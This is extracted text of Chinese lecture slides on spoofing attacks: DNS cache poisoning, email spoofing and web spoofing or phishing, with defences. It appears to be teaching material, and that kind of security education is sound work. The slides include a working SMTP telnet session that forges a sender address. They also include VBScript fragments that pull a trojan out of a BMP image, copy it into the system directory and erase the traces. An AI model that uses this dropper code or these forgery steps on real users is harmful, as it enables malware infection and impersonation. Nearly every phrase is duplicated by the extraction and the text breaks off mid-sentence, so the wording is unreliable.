网络安全欺骗攻击课件.pptx

1、网络安全 刘敏贤 副教授西南科技大学计算机科学与技术学院2第第5章章 缓冲区溢出攻击回顾缓冲区溢出攻击回顾l缓冲区溢出攻击的基本原理、方法缓冲区溢出攻击的基本原理、方法l缓冲区溢出程序的原理及要素缓冲区溢出程序的原理及要素l攻击攻击UNIXl攻击攻击WINDOWS3第第7章章 欺骗攻击欺骗攻击l欺骗攻击是网络攻击的一种重要手段。常见的欺骗攻击是网络攻击的一种重要手段。常见的欺骗攻击方式有：欺骗攻击方式有：DNS欺骗攻击；欺骗攻击；Email欺骗欺骗攻击；攻击；Web欺骗攻击和欺骗攻击和IP欺骗攻击等。本章介欺骗攻击等。本章介绍这些主要欺骗攻击的原理、实现技术。绍这些主要欺骗攻击的原理、实现技术

2、。 4第第7章章 欺骗攻击欺骗攻击l7.1 DNS欺骗攻击欺骗攻击 l7.2 Email欺骗攻击欺骗攻击 l7.3 Web欺骗攻击欺骗攻击 l7.4 IP欺骗攻击欺骗攻击 52022-6-225概述概述l在在Internet上计算机之间相互进行的交流上计算机之间相互进行的交流建立在两个前提之下：建立在两个前提之下：认证（认证（Authentication）信任（信任（Trust）62022-6-226概述概述l认证认证:认证是网络上的计算机用于相互间进行识认证是网络上的计算机用于相互间进行识别的一种鉴别过程，经过认证的过程，获准相别的一种鉴别过程，经过认证的过程，获准相互交流的计算机之间就会建

3、立起相互信任的关互交流的计算机之间就会建立起相互信任的关系。系。 72022-6-227概述概述l信任信任:信任和认证具有逆反关系，即如果计算机信任和认证具有逆反关系，即如果计算机之间存在高度的信任关系，则交流时就不会要之间存在高度的信任关系，则交流时就不会要求严格的认证。而反之，如果计算机之间没有求严格的认证。而反之，如果计算机之间没有很好的信任关系，则会进行严格的认证。很好的信任关系，则会进行严格的认证。82022-6-228概述概述l欺骗实质上就是一种冒充身份通过认证骗取信欺骗实质上就是一种冒充身份通过认证骗取信任的攻击方式。攻击者针对认证机制的缺陷，任的攻击方式。攻击者针对认证机制的缺

4、陷，将自己伪装成可信任方，从而与受害者进行交将自己伪装成可信任方，从而与受害者进行交流，最终攫取信息或是展开进一步攻击。流，最终攫取信息或是展开进一步攻击。 92022-6-229概述概述l目前比较流行的欺骗攻击主要有目前比较流行的欺骗攻击主要有5种：种：IP欺骗欺骗：使用其他计算机的：使用其他计算机的IP来骗取连接，获得信来骗取连接，获得信息或者得到特权；息或者得到特权；电子邮件欺骗电子邮件欺骗：电子邮件发送方地址的欺骗；：电子邮件发送方地址的欺骗；DNS欺骗欺骗：域名与：域名与IP地址转换过程中实现的欺骗；地址转换过程中实现的欺骗；Web欺骗欺骗：创造某个万维网网站的复制影像，从而：创造某

5、个万维网网站的复制影像，从而达到欺骗网站用户目的的攻击。达到欺骗网站用户目的的攻击。10DNS欺骗攻击欺骗攻击lDNS欺骗原理欺骗原理假设当提交给某个域名服务器的域名解析请求的数据包假设当提交给某个域名服务器的域名解析请求的数据包被截获，然后按截获者的意图将一个虚假的被截获，然后按截获者的意图将一个虚假的IP地址作为地址作为应答信息返回给请求者，这时，原始请求者就会把这个应答信息返回给请求者，这时，原始请求者就会把这个虚假的虚假的IP地址作为它所要请求的域名而进行连接，显然地址作为它所要请求的域名而进行连接，显然它被欺骗到了别处而根本连接不上自己想要连接的那个它被欺骗到了别处而根本连接不上自己

6、想要连接的那个域名域名 对那个客户想要连接的域名而言，它就算是被黑掉了，对那个客户想要连接的域名而言，它就算是被黑掉了，因为客户由于无法得到它的正确的因为客户由于无法得到它的正确的IP地址而无法连接上地址而无法连接上它它第第7 7章章 第第1 1节节112022-6-2211DNS工作原理工作原理lDNS的全称是的全称是Domain Name Server即域名服即域名服务器，当一台主机发送一个请求要求解析某个务器，当一台主机发送一个请求要求解析某个域名时，它会首先把解析请求发到自己的域名时，它会首先把解析请求发到自己的DNS服务器上。服务器上。lDNS的功能是提供主机名字和的功能是提供主机名

7、字和IP地址之间的转地址之间的转换信息。换信息。lDNS服务器里有一个服务器里有一个“DNS缓存表缓存表”，里面，里面存储了此存储了此DNS服务器所管辖域内主机的域名和服务器所管辖域内主机的域名和IP地址的对应关系。地址的对应关系。122022-6-2212DNS工作原理工作原理13DNS解析出解析出IP的过程（的过程（1）14DNS解析出解析出IP的过程（的过程（2）152022-6-2215DNS工作原理工作原理 上图中有三台主机：客户主机、上图中有三台主机：客户主机、域域DNS服务器和服务器和域域DNS服务器。其中服务器。其中域域DNS服务器直接为客户主机提供服务器直接为客户主机提供DN

8、S服务。下面对服务。下面对这四个过程进行解释。这四个过程进行解释。 162022-6-2216DNS域名解析过程域名解析过程172022-6-2217DNS域名解析过程（域名解析过程（2）182022-6-2218DNS欺骗的原理及实现步骤欺骗的原理及实现步骤l当客户主机向本地当客户主机向本地DNS服务器查询域名的时候，服务器查询域名的时候，如果服务器的缓存中已经有相应记录，如果服务器的缓存中已经有相应记录，DNS服服务器就不会再向其他服务器进行查询，而是直务器就不会再向其他服务器进行查询，而是直接将这条记录返回给用户。接将这条记录返回给用户。l而入侵者欲实现而入侵者欲实现DNS欺骗，关键的一

9、个条件就欺骗，关键的一个条件就是在是在DNS服务器的本地服务器的本地Cache中缓存一条伪造中缓存一条伪造的解析记录。的解析记录。192022-6-2219DNS欺骗的原理及实现步骤欺骗的原理及实现步骤202022-6-2220DNS欺骗的原理及实现步骤欺骗的原理及实现步骤212022-6-2221DNS欺骗的原理及实现步骤欺骗的原理及实现步骤l有了对有了对DNS服务器进行欺骗的可能，攻击者怎服务器进行欺骗的可能，攻击者怎样伪造样伪造DNS应答信息就成了问题的焦点。应答信息就成了问题的焦点。l目前有两种可能情况下的实现办法目前有两种可能情况下的实现办法:攻击者可以控制本地的域名服务器攻击者可以

10、控制本地的域名服务器攻击者无法控制任何攻击者无法控制任何DNS服务器服务器222022-6-2222第一种可能情况第一种可能情况232022-6-2223第一种可能情况第一种可能情况(2)242022-6-2224第二种可能情况第二种可能情况l另一种更现实的情况另一种更现实的情况，就是攻击者无法控制任何，就是攻击者无法控制任何DNS服务器，但他可以控制该服务所在网络的某台主机，服务器，但他可以控制该服务所在网络的某台主机，并可以监听该网络中的通信情况。这时候，黑客要对并可以监听该网络中的通信情况。这时候，黑客要对远程的某个远程的某个DNS服务器进行欺骗攻击，所采用的手段服务器进行欺骗攻击，所采

11、用的手段很像很像IP欺骗攻击：欺骗攻击：l首先，黑客要冒充某个域名服务器的首先，黑客要冒充某个域名服务器的IP地址；地址；l其次，黑客要能预测目标域名服务器所发送其次，黑客要能预测目标域名服务器所发送DNS数据数据包的包的ID号。号。l确定目标确定目标DNS服务器的服务器的ID号即为号即为DNS欺骗攻击的关键欺骗攻击的关键所在所在252022-6-2225第二种可能情况第二种可能情况(2)lDNS数据是通过数据是通过UDP协议传递的，在协议传递的，在DNS服务器之服务器之间进行域名解析通信时，请求方和应答方都使用间进行域名解析通信时，请求方和应答方都使用UDP 53端口，而这样的通信过程往往是

12、并行的，也就是说，端口，而这样的通信过程往往是并行的，也就是说，DNS域名服务器之间同时可能会进行多个解析过程，域名服务器之间同时可能会进行多个解析过程，既然不同的过程使用相同的端口号，那靠什么来彼此既然不同的过程使用相同的端口号，那靠什么来彼此区别呢区别呢?l答案就在答案就在DNS报文里面。报文里面。DNS报文格式头部的报文格式头部的ID域，域，是用于区别不同会话过程的，这有点类似于是用于区别不同会话过程的，这有点类似于TCP中的中的序列号，域名解析的请求方和应答方只有使用相同的序列号，域名解析的请求方和应答方只有使用相同的ID号才能证明是同一个会话号才能证明是同一个会话(由请求方决定所使用

13、的由请求方决定所使用的ID)。l不同的解析会话，采用不同的不同的解析会话，采用不同的ID号。号。262022-6-2226第二种可能情况第二种可能情况(3)l在一段时期内，在一段时期内，DNS服务器一般都采用一种有章可服务器一般都采用一种有章可循的循的ID生成机制，例如，对于每次发送的域名解析生成机制，例如，对于每次发送的域名解析请求，依次将数据包中的请求，依次将数据包中的ID加加1。l如此一来，攻击者如果可以在某个如此一来，攻击者如果可以在某个DNS服务器的网服务器的网络中进行络中进行嗅探嗅探，他只要向远程的，他只要向远程的DNS服务器发送一服务器发送一个对本地某域名的解析请求，通过嗅探得到

14、的来自个对本地某域名的解析请求，通过嗅探得到的来自目标目标DNS服务器的请求数据包（因为远程服务器的请求数据包（因为远程DNS服务服务器肯定会转而请求本地的器肯定会转而请求本地的DNS服务器），攻击者就服务器），攻击者就可以得到想要的可以得到想要的ID号了。号了。272022-6-2227第二种可能情况第二种可能情况(4)l例子：例子：域的域的DNS服务器向服务器向域域的的DNS服务器请求解析，如果攻击者所伪造服务器请求解析，如果攻击者所伪造的的DNS应答包中含有正确的应答包中含有正确的ID号，并且抢在号，并且抢在域的域的DNS服务器之前向服务器之前向域的域的DNS服务器返回伪造信息，欺骗攻击

15、就服务器返回伪造信息，欺骗攻击就将获得成功的。将获得成功的。282022-6-2228第二种可能情况第二种可能情况(5)l其实，即使攻击者无法监听某个拥有其实，即使攻击者无法监听某个拥有DNS服务器的服务器的网络，也有办法得到目标网络，也有办法得到目标DNS服务器的服务器的ID号。号。首先，他向目标首先，他向目标DNS服务器请求对某个不存在域名地址服务器请求对某个不存在域名地址（但该域是存在的）进行解析。（但该域是存在的）进行解析。然后，攻击者冒充所请求域的然后，攻击者冒充所请求域的DNS服务器，向目标服务器，向目标DNS服服务器连续发送应答包，这些包中的务器连续发送应答包，这些包中的ID号依

16、次递增。号依次递增。过一段时间，攻击者再次向目标过一段时间，攻击者再次向目标DNS服务器发送针对该域服务器发送针对该域名的解析请求，如果得到返回结果，就说明目标名的解析请求，如果得到返回结果，就说明目标DNS服务服务器接受了刚才黑客的伪造应答，继而说明黑客猜测的器接受了刚才黑客的伪造应答，继而说明黑客猜测的ID号号在正确的区段上，否则，攻者可以再次尝试。在正确的区段上，否则，攻者可以再次尝试。 292022-6-2229第二种可能情况第二种可能情况(6)l实际攻击中，第二种攻击方法实现比较复杂。实际攻击中，第二种攻击方法实现比较复杂。l知道了知道了ID号，并且知道了号，并且知道了ID号的增长规

17、律，以号的增长规律，以下的过程类似于下的过程类似于IP欺骗攻击。欺骗攻击。302022-6-2230一次一次DNS欺骗攻击的完整过程欺骗攻击的完整过程312022-6-2231DNS欺骗的局限性及防御欺骗的局限性及防御322022-6-2232DNS欺骗的局限性及防御欺骗的局限性及防御l在配置在配置DNS服务器的时候注意：服务器的时候注意：使用最新版本使用最新版本DNS服务器软件并及时安装补丁；服务器软件并及时安装补丁；关闭关闭DNS服务器的递归功能：服务器的递归功能：DNS服务器利用缓存中的记录服务器利用缓存中的记录信息回答查询请求或是信息回答查询请求或是DNS服务器通过查询其它服务器获得服

18、务器通过查询其它服务器获得查询信息并将它发送给客户机，这两种查询方式称为查询信息并将它发送给客户机，这两种查询方式称为递归查递归查询询，这种查询方式容易导致，这种查询方式容易导致DNS欺骗。欺骗。限制区域传输范围：限制域名服务器做出响应的地址、限制限制区域传输范围：限制域名服务器做出响应的地址、限制域名服务器做出响应的递归请求地址、限制发出请求的地址；域名服务器做出响应的递归请求地址、限制发出请求的地址；限制动态更新；限制动态更新；采用分层的采用分层的DNS体系结构。体系结构。33 Email欺骗攻击欺骗攻击lEmail欺骗方法欺骗方法攻击者佯称自己为系统管理员（邮件地址和系攻击者佯称自己为系

19、统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序似正常的附件中加载病毒或其他木马程序 第第7 7章章 第第2 2节节34 Email欺骗攻击欺骗攻击lEmail欺骗实现步骤欺骗实现步骤SMTP服务器服务器l允许匿名登录填写假的名称和发信人地址填写假的名称和发信人地址使用使用web形式骗取密码，或者使用附件植入木形式骗取密码，或者使用附件植入木马马第第7 7章章 第第2 2节节352022-6-2235电子邮件欺骗及防御技术电子

20、邮件欺骗及防御技术l电子邮件欺骗的原理电子邮件欺骗的原理l电子邮件欺骗的防御电子邮件欺骗的防御362022-6-2236电子邮件欺骗的原理电子邮件欺骗的原理l攻击者使用电子邮件欺骗有三个目的：攻击者使用电子邮件欺骗有三个目的：第一，隐藏自己的身份。第一，隐藏自己的身份。第二，如果攻击者想冒充别人，他能假冒那个人的第二，如果攻击者想冒充别人，他能假冒那个人的电子邮件。电子邮件。第三，电子邮件欺骗能被看作是社会工程的一种表第三，电子邮件欺骗能被看作是社会工程的一种表现形式。现形式。37电子邮件欺骗的原理电子邮件欺骗的原理l一个邮件系统的传输包含用户代理（一个邮件系统的传输包含用户代理（User A

21、gent）、传输代理（）、传输代理（Transfer Agent）及投递代理（）及投递代理（Delivery Agent）三大部分。）三大部分。l用户代理是一个用户端发信和收信的程序，负责将信件按照一定的标用户代理是一个用户端发信和收信的程序，负责将信件按照一定的标准包装，然后送到邮件服务器，将信件发出或由邮件服务器收回。传准包装，然后送到邮件服务器，将信件发出或由邮件服务器收回。传输代理则负责信件的交换和传输，将信件传送至适当的邮件服务器。输代理则负责信件的交换和传输，将信件传送至适当的邮件服务器。再由投递代理将信件分发至最终用户的邮箱。再由投递代理将信件分发至最终用户的邮箱。l在正常的情况

22、下，邮件会尽量将发送者的名字和地址包括进邮件头信在正常的情况下，邮件会尽量将发送者的名字和地址包括进邮件头信息中，但是，有时候，发送者希望将邮件发送出去而不希望收件者知息中，但是，有时候，发送者希望将邮件发送出去而不希望收件者知道是谁发的，这种发送邮件的方法称为匿名邮件。道是谁发的，这种发送邮件的方法称为匿名邮件。l实现匿名的一种最简单的方法，是简单地改变电子邮件软件里的发送实现匿名的一种最简单的方法，是简单地改变电子邮件软件里的发送者的名字，但通过邮件头的其它信息，仍能够跟踪发送者。者的名字，但通过邮件头的其它信息，仍能够跟踪发送者。l另一种比较彻底的匿名方式是让其他人发送这个邮件，邮件中的

23、发信另一种比较彻底的匿名方式是让其他人发送这个邮件，邮件中的发信地址就变成了转发者的地址了。现在因特网上有大量的匿名转发者（地址就变成了转发者的地址了。现在因特网上有大量的匿名转发者（或称为匿名服务器）。或称为匿名服务器）。382022-6-2238电子邮件欺骗的原理电子邮件欺骗的原理l执行电子邮件欺骗有三种基本方法，每一种执行电子邮件欺骗有三种基本方法，每一种有不同难度级别，执行不同层次的隐蔽。它有不同难度级别，执行不同层次的隐蔽。它们分别是：们分别是： 利用相似的电子邮件地址利用相似的电子邮件地址 直接使用伪造的直接使用伪造的E-mail地址地址远程登录到远程登录到SMTP端口发送邮件端口

24、发送邮件392022-6-2239利用相似的电子邮件地址利用相似的电子邮件地址l这主要是利用人们的大意心理。这主要是利用人们的大意心理。l攻击者找到一个受害者熟悉的名字。有了攻击者找到一个受害者熟悉的名字。有了这个名字后，攻击者注册一个看上去像受这个名字后，攻击者注册一个看上去像受害者熟悉的名字的邮件地址。这样收信人害者熟悉的名字的邮件地址。这样收信人很可能会回复这个邮箱发来信，这样攻击很可能会回复这个邮箱发来信，这样攻击者就有得到想要信息的可能性。者就有得到想要信息的可能性。 402022-6-2240直接使用伪造的直接使用伪造的Email地址地址lSMTP协议（即简单邮件传输协议）有着一个

25、协议（即简单邮件传输协议）有着一个致命的缺陷：它所遵循过于信任的原则，没有致命的缺陷：它所遵循过于信任的原则，没有设计身份验证系统。设计身份验证系统。 SMTP建立在假定人们的建立在假定人们的身份和他们所声称一致的基础之上，没有对邮身份和他们所声称一致的基础之上，没有对邮件发送者的身份进行验证。件发送者的身份进行验证。l这使得人们可以随意构造发件人地址来发送邮这使得人们可以随意构造发件人地址来发送邮件。下页我们通过修改邮件客户端软件的设置件。下页我们通过修改邮件客户端软件的设置来示例这一点。来示例这一点。412022-6-2241直接使用伪造的直接使用伪造的Email地址地址对于那些没有设置对

26、于那些没有设置SMTP身份身份验证功能的邮件服务器，例如右图验证功能的邮件服务器，例如右图所示的所示的Outlook邮件客户软件就不邮件客户软件就不需要做相应的设置，当用户使用邮需要做相应的设置，当用户使用邮件客户软件发出电子邮件时，发送件客户软件发出电子邮件时，发送邮件服务器不会对发件人地址进行邮件服务器不会对发件人地址进行验证或者确认，因此攻击者能够随验证或者确认，因此攻击者能够随意指定他想使用的所有地址，而这意指定他想使用的所有地址，而这些地址当然会作为邮件源出现在收些地址当然会作为邮件源出现在收件人的信中。件人的信中。422022-6-2242直接使用伪造的直接使用伪造的Email地址

27、地址此外，在右图所示的例此外，在右图所示的例子中，攻击者还能够指定子中，攻击者还能够指定他想要的任何邮件返回地他想要的任何邮件返回地址。因此当用户回信时，址。因此当用户回信时，答复回到攻击者所掌握的答复回到攻击者所掌握的邮箱邮箱testtest，而不是回，而不是回到被盗用了地址的人那里。到被盗用了地址的人那里。432022-6-2243远程登录到远程登录到SMTP端口端口lSMTP协议一般使用协议一般使用25号端口，邮件服务器通号端口，邮件服务器通过它在互联网上发送邮件。过它在互联网上发送邮件。 l执行电子邮件欺骗的一个比较复杂的方法是远执行电子邮件欺骗的一个比较复杂的方法是远程登录到邮件服务

28、器的程登录到邮件服务器的25号端口发送邮件。号端口发送邮件。442022-6-2244远程登录到远程登录到25号端口号端口(2)l攻击者首先找到邮件服务器的攻击者首先找到邮件服务器的IP地址，或者通过运行端口地址，或者通过运行端口扫描程序来判断哪些机器是扫描程序来判断哪些机器是25号端口开放的邮件服务器。号端口开放的邮件服务器。l在攻击者有了一台在攻击者有了一台25号端口开放的机器和一台正在运行的号端口开放的机器和一台正在运行的邮件服务器后，输入下面的命令：邮件服务器后，输入下面的命令：telnet IP地址地址 25l在连接上以后，再输入下面的内容：在连接上以后，再输入下面的内容：HELOM

29、AIL FROM: 欺骗伪装的欺骗伪装的mail地址地址RCPT TO: 收件的受害者收件的受害者mail地址地址DATA邮件的内容邮件的内容452022-6-2245示例：远程登录示例：远程登录25端口的端口的Email欺骗欺骗l实验环境实验环境局域网局域网mail服务器为服务器为192.168.1.250Mail服务器不需要身份验证服务器不需要身份验证内有两个用户分别为：内有两个用户分别为：lliuylan.nipclchensllan.nipcl实验方式实验方式伪装成伪装成liuylan.nipc给给chensllan.nipc发邮件发邮件462022-6-2246Email欺骗过程欺骗

30、过程telnet到服务器到服务器l通过通过telnet，连接到邮件服务器的，连接到邮件服务器的25端口。在端口。在cmd.exe下使用的命令：下使用的命令：telnet 192.168.1.250 25l结果如图所示，说明已经连接到了结果如图所示，说明已经连接到了25端口端口472022-6-2247Email欺骗过程欺骗过程发送邮件内容发送邮件内容l220 nipcoa Magic Winmail Server 2.4(Build 0530) ESMTP readylhelol250 nipcoa Magic Winmail Server 2.4(Build 0530)lmail from:

31、 liuylan.nipcl250 oklrcpt to: chensllan.nipcl250 okldatal354 go aheadlsubject: testlto: chensllan.nipclfrom: liuylan.nipclthis is a testl.l250 ok message accepted for deliverylquitl221 nipcoa Magic Winmail Server 2.4(Build 0530)红色部分是根据红色部分是根据SMTP协议自行输入的内容；协议自行输入的内容；黑色部分是服务器的返黑色部分是服务器的返回信息。回信息。482022

32、-6-2248Email欺骗过程欺骗过程发送邮件内容截发送邮件内容截屏屏492022-6-2249Email欺骗过程欺骗过程结果结果l用户用户chensllan.nipc将收到将收到来自来自liuylan.nipc的邮件，的邮件，如图所示。如图所示。l但是但是liuylan.nipc并不知道并不知道自己发送了邮件。自己发送了邮件。l试想，如果邮件的内容里有病试想，如果邮件的内容里有病毒或者其它恶意代码，且毒或者其它恶意代码，且chensllan.nipc信任信任liuylan.nipc，那么将会是，那么将会是一件多么危险的事情啊。一件多么危险的事情啊。502022-6-22505.4.2 电子

33、邮件欺骗的防御电子邮件欺骗的防御l做为互联网用户，必须时刻树立风险意识，做为互联网用户，必须时刻树立风险意识，不要随意打开一个不可信任的邮件。不要随意打开一个不可信任的邮件。l此外，下面介绍几种防范方法分别从这几此外，下面介绍几种防范方法分别从这几个方面入手：个方面入手：邮件接收者邮件接收者邮件发送者邮件发送者邮件服务器邮件服务器邮件加密邮件加密512022-6-2251防范方法防范方法邮件接收者邮件接收者l做为邮件接收者来说，做为邮件接收者来说，用户需要合理配置邮件用户需要合理配置邮件客户端，使每次总能显示出完整的电子邮件地客户端，使每次总能显示出完整的电子邮件地址，而不是仅仅显示别名，完整

34、的电子邮件地址，而不是仅仅显示别名，完整的电子邮件地址能提供一些迹象表明正在发生一些不平常的址能提供一些迹象表明正在发生一些不平常的事情。事情。l用户应该注意检验发件人字段，不要被相似的用户应该注意检验发件人字段，不要被相似的发信地址所蒙蔽。发信地址所蒙蔽。522022-6-2252防范方法防范方法邮件发送者邮件发送者l做为邮件发送者来说，做为邮件发送者来说，如果你使用如果你使用foxmail或者或者outlook之类的邮件客户端，你必须保之类的邮件客户端，你必须保护好这些邮件客户端，防止他人对客户端的护好这些邮件客户端，防止他人对客户端的设置进行修改。设置进行修改。532022-6-2253

35、防范方法防范方法邮件服务器邮件服务器l对于邮件服务器提供方来说，对于邮件服务器提供方来说，采用的采用的SMTP身份验证身份验证机制。机制。l原来使用原来使用SMTP协议发送邮件的时候并不需要任何验协议发送邮件的时候并不需要任何验证，身份欺骗极易实现。现在将证，身份欺骗极易实现。现在将POP协议收取邮件需协议收取邮件需要用户名要用户名/密码验证的思想移至到密码验证的思想移至到SMTP协议，发送邮协议，发送邮件也需要类似的验证。绝大多数邮件服务提供商都是件也需要类似的验证。绝大多数邮件服务提供商都是采用的这种做法，通常是使用与接收邮件相同的用户采用的这种做法，通常是使用与接收邮件相同的用户名和密码

36、来发送邮件。名和密码来发送邮件。l采用这种方法之后，虽然采用这种方法之后，虽然SMTP协议安全性的问题仍协议安全性的问题仍然无法从根本上得到解决，但是电子邮件欺骗已经变然无法从根本上得到解决，但是电子邮件欺骗已经变得不像过去那么容易了。得不像过去那么容易了。542022-6-2254防范方法防范方法PGP加密加密l还有一种可能的解决方法是使用公钥加密，其还有一种可能的解决方法是使用公钥加密，其中应用最广泛的就是中应用最广泛的就是PGP邮件加密。邮件加密。lPGP (Pretty Good Privacy) 是一个可以让您的是一个可以让您的电子邮件拥有保密功能的程序。藉此你可以将电子邮件拥有保密

37、功能的程序。藉此你可以将你的邮件加密你的邮件加密 ，一旦加密后，邮件看起来是一，一旦加密后，邮件看起来是一堆无意义的乱码堆无意义的乱码 。PGP 提供了极强的保护功能，提供了极强的保护功能，即使是最先进的解码分析技术也无法解读加密即使是最先进的解码分析技术也无法解读加密后的文字。后的文字。lPGP 加密与解密不像其它传统加密的方式，而加密与解密不像其它传统加密的方式，而是以公钥密码学为基础的。是以公钥密码学为基础的。 552022-6-2255防范方法防范方法PGP加密（加密（2）l举例来说，当你要传送一封保密信或档案给某人时，举例来说，当你要传送一封保密信或档案给某人时，必须先取得那人的公钥

38、（必须先取得那人的公钥（Public Key），然后利用这），然后利用这个公钥将信件加密。当某人收到您加密的信件后，他个公钥将信件加密。当某人收到您加密的信件后，他必须利用相应的私钥必须利用相应的私钥(Secret Key) 来解密。因此，除来解密。因此，除非其它人拥有收信者的私钥，否则无法解开发信人所非其它人拥有收信者的私钥，否则无法解开发信人所加密的信件。同时，收信人在使用私钥解密时，还必加密的信件。同时，收信人在使用私钥解密时，还必须输入通行码，如此又对加密后的邮件多了一层保护。须输入通行码，如此又对加密后的邮件多了一层保护。56 Email欺骗攻击欺骗攻击lEmail欺骗的防护欺骗的防

39、护查看邮件原文，检查真正的发件服务器地址查看邮件原文，检查真正的发件服务器地址通过邮件链接网页的时候，注意真正的网站地通过邮件链接网页的时候，注意真正的网站地址址在不同的应用中，尽可能使用不相同的、无关在不同的应用中，尽可能使用不相同的、无关的密码的密码第第7 7章章 第第2 2节节57 Web欺骗攻击欺骗攻击第第7 7章章 第第3 3节节58 Web欺骗攻击欺骗攻击lWeb欺骗方法欺骗方法改写改写URLWeb中的脚本中的脚本第第7 7章章 第第3 3节节592022-6-2259Web欺骗的概念欺骗的概念lWeb站点给用户提供了丰富多彩的信息，站点给用户提供了丰富多彩的信息，Web页面上的页

40、面上的文字、图画与声音可以给人深刻的印象。在计算机世界中文字、图画与声音可以给人深刻的印象。在计算机世界中，我们往往都习惯各类图标、图形，代表各类不同的含义，我们往往都习惯各类图标、图形，代表各类不同的含义。l人们往往还会在事件的时间先后顺序中得到某种暗示。如人们往往还会在事件的时间先后顺序中得到某种暗示。如果在单击银行的网页时果在单击银行的网页时username对话框同时出现了，用对话框同时出现了，用户自然会认为应该输入在该银行的账户与口令。如果你在户自然会认为应该输入在该银行的账户与口令。如果你在单击了一个文档链接后，立即开始了下载，那么你很自然单击了一个文档链接后，立即开始了下载，那么你

41、很自然地会认为该文件正从该站点下载。然而，以上的想法不一地会认为该文件正从该站点下载。然而，以上的想法不一定总是正确的。定总是正确的。60Web欺骗的概念欺骗的概念lWeb欺骗是一种电子信息欺骗，攻击者创造了欺骗是一种电子信息欺骗，攻击者创造了一个完整的令人信服的一个完整的令人信服的Web世界，但实际上它世界，但实际上它却是一个虚假的复制。却是一个虚假的复制。l虚假的虚假的Web看起来十分逼真，它拥有相同的网看起来十分逼真，它拥有相同的网页和链接。然而攻击者控制着这个虚假的页和链接。然而攻击者控制着这个虚假的Web站点，这样受害者的浏览器和站点，这样受害者的浏览器和Web之间的所有之间的所有网

42、络通信就完全被攻击者截获。网络通信就完全被攻击者截获。612022-6-2261Web欺骗的概念欺骗的概念l由于攻击者可以观察或者修改任何从受害者到由于攻击者可以观察或者修改任何从受害者到Web服务器的信息，同样地，也控制着从服务器的信息，同样地，也控制着从Web服务器发至受害者的返回数据，这样攻击者就有服务器发至受害者的返回数据，这样攻击者就有发起攻击的可能性。发起攻击的可能性。l攻击者能够监视被攻击者的网络信息，记录他们攻击者能够监视被攻击者的网络信息，记录他们访问的网页和内容。当被攻击者填完一个表单并访问的网页和内容。当被攻击者填完一个表单并发送后，这些数据将被传送到发送后，这些数据将被

43、传送到Web服务器，服务器，Web服务器将返回必要的信息，但不幸的是，攻服务器将返回必要的信息，但不幸的是，攻击者完全可以截获并使用这些信息。击者完全可以截获并使用这些信息。622022-6-2262Web欺骗的概念欺骗的概念l在得到必要的数据后，攻击者可以通过修在得到必要的数据后，攻击者可以通过修改受害者和改受害者和Web服务器两方任何一方数据，服务器两方任何一方数据，来进行破坏活动。攻击者可以修改受害者来进行破坏活动。攻击者可以修改受害者的确认数据，攻击者还可以修改的确认数据，攻击者还可以修改Web服务服务器返回的数据。器返回的数据。 632022-6-2263Web欺骗的工作原理欺骗的工

44、作原理lWeb欺骗能够成功的关键是在受害者和真实欺骗能够成功的关键是在受害者和真实Web服务器之间插入攻击者的服务器之间插入攻击者的Web服务器，服务器，这种攻击常被称为这种攻击常被称为“中间人攻击中间人攻击(man-in-the-middle)”。 642022-6-2264Web欺骗的工作原理欺骗的工作原理652022-6-2265Web欺骗的工作原理欺骗的工作原理662022-6-2266Web欺骗的工作原理欺骗的工作原理67 Web欺骗攻击欺骗攻击l改写改写URL email with html links seems like Microsoft html page with lin

45、ks like : http:/第第7 7章章 第第3 3节节68 Web欺骗攻击欺骗攻击l利用利用Web脚本进行欺骗脚本进行欺骗原理原理l攻击者设计一个网页，并诱使受害者浏览该网页l该网页中包含有一个图片和一个脚本l当浏览时，该图片被下载到受害者计算机的临时目录中，而脚本被运行l脚本的功能是将图片中隐藏的木马提取出来，并设置为自动执行第第7 7章章 第第3 3节节69 Web欺骗攻击欺骗攻击l利用利用Web脚本进行欺骗脚本进行欺骗基本控件基本控件a1=document.applets0; a1.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B); a

46、1.createInstance(); reg = a1.GetObject(); a1.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228); a1.createInstance(); FSO = a1.GetObject(); 第第7 7章章 第第3 3节节70Web欺骗攻击欺骗攻击lWeb脚本脚本从从BMP图片中释放程序图片中释放程序set Lt=FSO.CreateTextFile(path & tmp.in) Lt.WriteLine(rbx) Lt.WriteLine(0) Lt.WriteLine(rcx) Lt.WriteLine(100

47、0) Lt.WriteLine(w136) Lt.WriteLine(q) Lt.Close 第第7 7章章 第第3 3节节71 Web欺骗攻击欺骗攻击lWeb脚本脚本从从BMP图片中释放程序图片中释放程序WSH.Run command /c debug & path & tmp.dat & path & tmp.out,false,6 On Error Resume Next FSO.GetFile(path & tmp.dat).Copy(winsys & tmp.exe) FSO.GetFile(path & tmp.dat).Delete FSO.GetFile(path & tmp.

48、in).Delete FSO.GetFile(path & tmp.out).Delete 第第7 7章章 第第3 3节节72 Web欺骗攻击欺骗攻击l其它其它Web攻击攻击网页病毒、木马（及时升级补丁、使用安全级别高网页病毒、木马（及时升级补丁、使用安全级别高的浏览器）的浏览器）HTTP劫持（网络整体防护）劫持（网络整体防护）网络钓鱼网络钓鱼第第7 7章章 第第3 3节节732022-6-2273Web欺骗案例欺骗案例l网络钓鱼网络钓鱼很多人是闻其名而色变，因为它经常扮演成很多人是闻其名而色变，因为它经常扮演成一只幕后黑手伸向人们的口袋一只幕后黑手伸向人们的口袋l确切地讲，网络钓鱼就是那些黑

49、客们借用电子邮件或确切地讲，网络钓鱼就是那些黑客们借用电子邮件或是模仿网上银行、网上购物等一切网上交易的页面而是模仿网上银行、网上购物等一切网上交易的页面而制作出假的网页页面，以假乱真，让用户在毫不知情制作出假的网页页面，以假乱真，让用户在毫不知情的情况下泄露出自己的相关账户信息（账号、密码），的情况下泄露出自己的相关账户信息（账号、密码），一旦这些黑客们得到了用户的账号信息，后果可想而一旦这些黑客们得到了用户的账号信息，后果可想而知。知。l经典案例：工商银行网上银行被黑客多次伪造经典案例：工商银行网上银行被黑客多次伪造742022-6-22网络入侵与防范讲义74 2005年1月，一个假冒中国

